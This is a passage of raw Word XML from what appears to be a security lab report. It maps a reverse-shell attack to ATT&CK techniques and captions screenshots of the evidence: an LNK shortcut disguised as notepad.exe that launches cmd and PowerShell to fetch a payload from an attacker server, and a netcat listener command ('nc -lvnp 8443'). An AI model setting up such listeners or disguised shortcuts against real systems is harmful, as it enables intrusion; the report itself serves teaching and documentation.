    <w:p w14:paraId="70861F52" w14:textId="5547A957" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Related techniques observed during execution (supporting evidence):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B5A29" w14:textId="6249130C" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8025A" w14:textId="734E248A" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1204.002 – User Execution: Malicious File (user clicks malicious LNK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE826A" w14:textId="2505865B" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0A002" w14:textId="7825A705" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1105 – Ingress Tool Transfer (payload downloaded from attacker server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE46DAE" w14:textId="63649B08" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7263B" w14:textId="5B280D0E" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1059.003 – Windows Command Shell (cmd.exe /c …)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C81F97" w14:textId="7ECD0154" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6660D01B" w14:textId="581AE936" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1059.001 – PowerShell (powershell.exe wget …)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E0B51" w14:textId="24678C58" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8790F4" w14:textId="5D0452A1" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T1070.004 – File Deletion (payload removed post-execution consistent with observed artefacts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F1AAB" w14:textId="4FE624EE" w:rsidR="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF"/>
    <w:p w14:paraId="33784437" w14:textId="64BD1190" w:rsidR="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc220896681"/>
      <w:commentRangeStart w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:commentRangeEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="12"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="775771D0" w14:textId="686DD4C6" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF"/>
    <w:p w14:paraId="68202759" w14:textId="50A7B227" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netcat listener on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BA1847" w14:textId="4D042E17" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence: nc -lvnp 8443 listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC2105" w14:textId="360542AF" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E87AC76" wp14:editId="095BCF1C">
            <wp:extent cx="3542083" cy="859611"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="475191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28666" name="Picture 1996928666"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3542083" cy="859611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084941D" w14:textId="57A9D72D" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41272505" w14:textId="4702273A" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F982E88" w14:textId="328252E8" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B693A7" w14:textId="4E82A10A" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24896649" w14:textId="1842F51E" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E18DF5F" w14:textId="7DDFFAB4" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4089C32F" w14:textId="42F5FBE3" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A722EC" w14:textId="05825447" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09265976" w14:textId="2E192B77" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C:\icrm showing the disguised shortcut notepad.exe (Shortcut) and the payload 8443 (Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB0713" w14:textId="17BEC70E" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E01147" w14:textId="342502E6" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8D061E" wp14:editId="571D60B3">
            <wp:extent cx="5829300" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1918880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0343" name="Picture 1918880343"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1619250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CBBCF4" w14:textId="165D04F8" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B677C1F" w14:textId="2D8A998C" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LNK properties window showing the Target launching cmd.exe /c powershell.ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="402714C5" wp14:editId="15DE11C3">
            <wp:extent cx="2121592" cy="2761727"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1715175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75069" name="Picture 1715175069"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2121592" cy="2761727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6566ACAB" w14:textId="21F7403C" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203591DD" w14:textId="5B1B5875" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The full highlighted shortcut command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BC002" w14:textId="5C4DABAB" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7EC236" wp14:editId="7FF60362">
            <wp:extent cx="5829300" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1943798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98654" name="Picture 1943798654"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="695325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C805B12" w14:textId="240DBE63" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A24AC3" w14:textId="034449EC" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacker netcat shows connection from victim and Windows command prompt appears</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC0CDE" w14:textId="4640533D" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DAE528B" wp14:editId="0B2C7F3B">
            <wp:extent cx="3086368" cy="979407"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1246874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74172" name="Picture 1246874172"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3086368" cy="979407"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75488E98" w14:textId="7CD23E5C" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C7DAD9" w14:textId="060FD7D9" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0010EC0F" w14:textId="757AFEAA" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABB64D7" w14:textId="2F784B45" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTTP access logs showing repeated GET /8443.exe with 200 status codes from victim IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C10D94" w14:textId="65693B90" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FAE683C" wp14:editId="6B00BEF7">
            <wp:extent cx="5694157" cy="1554615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1825176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76830" name="Picture 1825176830"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5694157" cy="1554615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A65036" w14:textId="69B30FE7" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E6C425" w14:textId="07ACE596" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C:\icrm showing the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC54FD" w14:textId="7514B464" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="545BEC5A" wp14:editId="48B1A9C9">
            <wp:extent cx="5829300" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2091770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70340" name="Picture 2091770340"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1743075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5ABC3" w14:textId="620C15DD" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72560D4E" w14:textId="2B79575F" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>whoami output confirming user context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8E3691" w14:textId="4DF612A9" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A79CEF9" w14:textId="107AD71B" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B8C7014" wp14:editId="264FDDBE">
            <wp:extent cx="3153215" cy="819264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1842901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01123" name="Picture 1842901123"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3153215" cy="819264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C860D5B" w14:textId="05460DDA" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424CE0DB" w14:textId="7FDB0BB0" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="6845FCFF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F7CF2" w14:textId="7571F195" w:rsidR="00ED5F9B" w:rsidRPr="00ED5F9B" w:rsidRDefault="6845FCFF" w:rsidP="00E41785">
